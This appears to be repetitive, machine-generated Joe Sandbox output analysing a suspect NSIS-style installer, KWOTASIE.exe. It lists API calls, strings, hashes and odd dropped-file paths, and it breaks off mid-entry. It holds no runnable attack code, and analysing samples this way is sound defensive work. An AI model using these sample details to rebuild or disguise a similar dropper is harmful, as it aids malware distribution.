              • Opcode ID: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
              • Instruction ID: beb1058faab58ab776b37266111e77616320e0f2a6455f46a6b6c1c153f06785
              • Opcode Fuzzy Hash: 32b3ac885727d1e190cdd40c39b4cdf091ab3af3085104150676e708dd364a64
              • Instruction Fuzzy Hash: B6015272558241EFE7006BB0AF8AA9A7FB4AB55301F10497EF241B61E2CA7800458B2D
              APIs
              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
              • MulDiv.KERNEL32(000EE5EC,00000064,000EFE58), ref: 00402E20
              • wsprintfW.USER32 ref: 00402E30
              • SetWindowTextW.USER32(?,?), ref: 00402E40
              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
              Strings
              • verifying installer: %d%%, xrefs: 00402E2A
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: verifying installer: %d%%
              • API String ID: 1451636040-82062127
              • Opcode ID: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
              • Instruction ID: 725db9d4d41e60ee2dd5d311e5346f84fbed97106a71cca60d70b9a4d06edbb5
              • Opcode Fuzzy Hash: e049c72b028903268a13e0303fe007745629d422319b61ed44a985218b4f833f
              • Instruction Fuzzy Hash: 73014471640208ABDF209F60DD49FAA3B69EB00708F008039FA05F91D0DBB989558B99
              APIs
              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
              • GlobalFree.KERNEL32(?), ref: 00402950
              • GlobalFree.KERNEL32(00000000), ref: 00402963
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Global$AllocFree$CloseDeleteFileHandle
              • String ID:
              • API String ID: 2667972263-0
              • Opcode ID: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
              • Instruction ID: c6e800f027f1e1b1e461e4fc783814b3910171fe2b09394c7840a14eb176b3fb
              • Opcode Fuzzy Hash: 794126d87b7ab7f3e2e070d8386bcb8afdde5fae5b7e809f26f6fd9fec4836ff
              • Instruction Fuzzy Hash: 9821BFB1D00124BBDF206FA5DE49D9E7E79EF08364F10423AF954762E1CB794C419B98
              APIs
              • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B0D
              • wsprintfW.USER32 ref: 00404B16
              • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s$6B
              • API String ID: 3540041739-3884863406
              • Opcode ID: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
              • Instruction ID: 5e68f5a3766037a7274f1f000e531c578f4d2f2b22a3e42eca2e55653584bdbe
              • Opcode Fuzzy Hash: 95c3251a73d665659f4e5ef41dc4b3ed63ce9024b19b633afc4b02d7477ffd45
              • Instruction Fuzzy Hash: F111D8736481283BDB00656D9C45E9F329CDB81374F150237FE66F61D1D9788C2186EC
              APIs
              • WideCharToMultiByte.KERNEL32(?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,000000FF,frerhunde\bordeauxvske\negroization,00000400,?,?,00000021), ref: 004025E2
              • lstrlenA.KERNEL32(frerhunde\bordeauxvske\negroization,?,?,C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct,000000FF,frerhunde\bordeauxvske\negroization,00000400,?,?,00000021), ref: 004025ED
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: ByteCharMultiWidelstrlen
              • String ID: C:\Windows\resources\0809\vovhundenes\harmonikasammenstdet.oct$frerhunde\bordeauxvske\negroization
              • API String ID: 3109718747-2267309972
              • Opcode ID: ea6228ab94128025b834a3833227cb1239f09ae99d1f9cdb451e84d7ec2b7adc
              • Instruction ID: 514f5b9530cea4d9367e026ee51610d144416164e286c499b2b09fde189c8ffc
              • Opcode Fuzzy Hash: ea6228ab94128025b834a3833227cb1239f09ae99d1f9cdb451e84d7ec2b7adc
              • Instruction Fuzzy Hash: B8113B32A00200FFDB146FB18E8D99F76649F54345F20843BF502F22C1D9BC49415B5E
              APIs
              • GetDlgItem.USER32(?,?), ref: 00401D5D
              • GetClientRect.USER32(00000000,?), ref: 00401D6A
              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
              • DeleteObject.GDI32(00000000), ref: 00401DA8
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              • Opcode ID: 3c90963baa5248ec8c3e32d30f7b74229283cbd29e4b1f5c47a94b45867cde17
              • Instruction ID: 477f9c078023e6e9cc07b453b9f7f3a7004dd49873a1bfc78c69f95ea128efdf
              • Opcode Fuzzy Hash: 3c90963baa5248ec8c3e32d30f7b74229283cbd29e4b1f5c47a94b45867cde17
              • Instruction Fuzzy Hash: CAF0EC72604518AFDB01DBE4DE88CEEB7BCEB08341B14047AF641F61A1CA749D118B78
              APIs
              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
              • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
              • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
              • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
              APIs
              • CharNextW.USER32(?,?,C:\,?,00405C3C,C:\,C:\,?,?,75923420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405BD6
              • CharNextW.USER32(00000000), ref: 00405BDB
              • CharNextW.USER32(00000000), ref: 00405BF3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CharNext
              • String ID: C:\
              • API String ID: 3213498283-3404278061
              • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
              • Instruction ID: 71fcaf91f17ad0c61ae46c06a49b7004919c5bb89cc9bf949e59d58efb239cdc
              • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
              • Instruction Fuzzy Hash: EAF09061914B2195EA3176544C45E7766BCEB96760B00807BE702B72C0EBB8A8C19FEE
              APIs
              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00405B23
              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403589,?,00000006,00000008,0000000A), ref: 00405B2D
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405B3F
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CharPrevlstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 2659869361-823278215
              • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
              • Instruction ID: c0ef0cb97c36de63e92d9fca1924244fe31698b984028f6787b43ddfdde79dcc
              • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
              • Instruction Fuzzy Hash: 7FD0A731106530AAC1117B548C04DDF72AC9E46344342047FF201B70A1C77C2D6287FD
              APIs
              • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
              • GetTickCount.KERNEL32 ref: 00402E8E
              • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
              • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Window$CountCreateDestroyDialogParamShowTick
              • String ID:
              • API String ID: 2102729457-0
              • Opcode ID: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
              • Instruction ID: fe37ef1f42e63d928baf9b7628c588a3f0f600393ee4f6b464cc40035c08f26a
              • Opcode Fuzzy Hash: d9dd720f51eef3d3fbe94177486472338db653888b87da4332a276649b206b5d
              • Instruction Fuzzy Hash: FAF03A30945620EFC7216B64FE0C99B7B65BB04B0174549BEF444F11A8CBB54881CA9C
              APIs
              • IsWindowVisible.USER32(?), ref: 00405253
              • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              • Opcode ID: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
              • Instruction ID: c9233ab90339d663537cd0f4838c8d9c3e37dbb77af5ce129741796423ccaa39
              • Opcode Fuzzy Hash: 085acd60d741280dfa694cfa38d19dbe5f2a98386977293df9f6c8f4e56f0e62
              • Instruction Fuzzy Hash: 4701717160060CABDF218F11ED80A9B3766EF94355F10447AF604752D0C77AAD929E2D
              APIs
              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,0040389D,004036B3,00000006,?,00000006,00000008,0000000A), ref: 004038DF
              • GlobalFree.KERNEL32(?), ref: 004038E6
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 004038D7
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: Free$GlobalLibrary
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 1100898210-823278215
              • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
              • Instruction ID: 4defd9e359f6bb8273ced32a5a12906ada9a5e6c3dc807c4d7f8d8681d186cd1
              • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
              • Instruction Fuzzy Hash: 68E01233901520AFCA216F55ED04B5E77ADAF58B22F09417BF8807B2608B785C929BD8
              APIs
              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KWOTASIE.exe,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B6F
              • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KWOTASIE.exe,C:\Users\user\Desktop\KWOTASIE.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B7F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: CharPrevlstrlen
              • String ID: C:\Users\user\Desktop
              • API String ID: 2709904686-1246513382
              • Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
              • Instruction ID: 4f2c6dc630764ad6ed400a220cd41f8d0a4aff102c3f5ecc88be1499634875f0
